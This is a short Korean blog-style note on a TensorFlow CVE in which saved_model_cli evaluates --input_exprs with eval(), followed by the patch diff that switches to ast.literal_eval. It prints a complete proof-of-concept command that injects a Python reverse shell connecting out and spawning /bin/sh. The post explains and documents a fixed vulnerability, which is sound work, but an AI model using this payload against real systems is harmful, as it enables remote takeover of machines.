Tensorflow CVE RCE

Tensorflow CVE 를 보다가 신기한게 있었다.

바로 Tensorflow 내부에 존재하는 saved_model_cli  파일을 실행할 때 옵션을 다음과 같이 주면 리버스 쉘이 따진다는 것이다. ㅇㅅㅇ!

saved_model_cli run --input_exprs 'hello=exec("""\nimport socket\nimport subprocess\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(("0.0.0.0",33419))\nsubprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())""")' --dir ./ --tag_set serve --signature_def serving_default

 

def preprocess_input_exprs_arg_string(input_exprs_str):
def preprocess_input_exprs_arg_string(input_exprs_str, safe=True):
  """Parses input arg into dictionary that maps input key to python expression.
  Parses input string in the format of 'input_key=<python expression>' into a
  dictionary that maps each input_key to its python expression.
  Args:
    input_exprs_str: A string that specifies python expression for input keys.
    Each input is separated by semicolon. For each input key:
      Each input is separated by semicolon. For each input key:
        'input_key=<python expression>'
    safe: Whether to evaluate the python expression as literals or allow
      arbitrary calls (e.g. numpy usage).
  Returns:
    A dictionary that maps input keys to their values.
@@ -545,8 +548,15 @@
 def preprocess_input_exprs_arg_string(input_exprs_str):
      raise RuntimeError('--input_exprs "%s" format is incorrect. Please follow'
                         '"<input_key>=<python expression>"' % input_exprs_str)
    input_key, expr = input_raw.split('=', 1)
    # ast.literal_eval does not work with numpy expressions
    input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
    if safe:
      try:
        input_dict[input_key] = ast.literal_eval(expr)
      except:
        raise RuntimeError(
            f'Expression "{expr}" is not a valid python literal.')
    else:
      # ast.literal_eval does not work with numpy expressions
      input_dict[input_key] = eval(expr)  # pylint: disable=eval-used
  return input_dict